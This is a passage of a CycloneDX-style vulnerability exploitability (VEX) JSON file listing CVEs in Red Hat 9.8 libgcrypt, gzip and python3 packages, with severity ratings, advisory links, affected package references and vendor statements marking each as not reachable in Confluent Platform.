          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41989"
        },
        {
          "url": "https://dev.gnupg.org/T8211"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-50147.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:47117"
        },
        {
          "url": "https://github.com/advisories/GHSA-wrv8-79m2-qg24"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-41989.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50147-0.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41990",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41990"
        },
        {
          "url": "https://dev.gnupg.org/T8208"
        },
        {
          "url": "https://github.com/advisories/GHSA-78pv-qq8x-94px"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-06-17T10:47:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41991",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        377
      ],
      "description": "GNU gzip contains a vulnerability in the gzexe utility related to insecure temporary file handling. When the mktemp utility is not available in the user\u2019s PATH, gzexe falls back to constructing a temporary file path based solely on the process ID (PID). This predictable filename is created without exclusive access or existence checks.\nA local attacker can pre\u2011create the predicted temporary file path as a symbolic link pointing to an arbitrary file writable by the victim. When gzexe runs, it follows the symlink and overwrites the target file, resulting in a time\u2011of\u2011check to time\u2011of\u2011use (TOCTOU) condition that allows arbitrary file overwrite.\n\nThis issue has been fixed in the commit 4e6f8b24ab823146ab8776f0b7fe486ab34d4269",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41991"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991/"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gzip.git/commit/?id=4e6f8b24ab823146ab8776f0b7fe486ab34d4269"
        },
        {
          "url": "https://github.com/advisories/GHSA-67v8-88jf-4x6q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41991"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8512-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41991"
        },
        {
          "url": "https://www.gnu.org/software/gzip"
        },
        {
          "url": "https://www.gnu.org/software/gzip/"
        }
      ],
      "published": "2026-06-29T12:16:29+00:00",
      "updated": "2026-07-01T14:02:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.12-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4224",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4224"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a"
        },
        {
          "url": "https://github.com/python/cpython/commit/24ce88b285f56ee11626cf5e472af3cd8cc7c621"
        },
        {
          "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785"
        },
        {
          "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee"
        },
        {
          "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768"
        },
        {
          "url": "https://github.com/python/cpython/issues/145986"
        },
        {
          "url": "https://github.com/python/cpython/pull/145987"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4224.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
        }
      ],
      "published": "2026-03-16T18:16:10+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
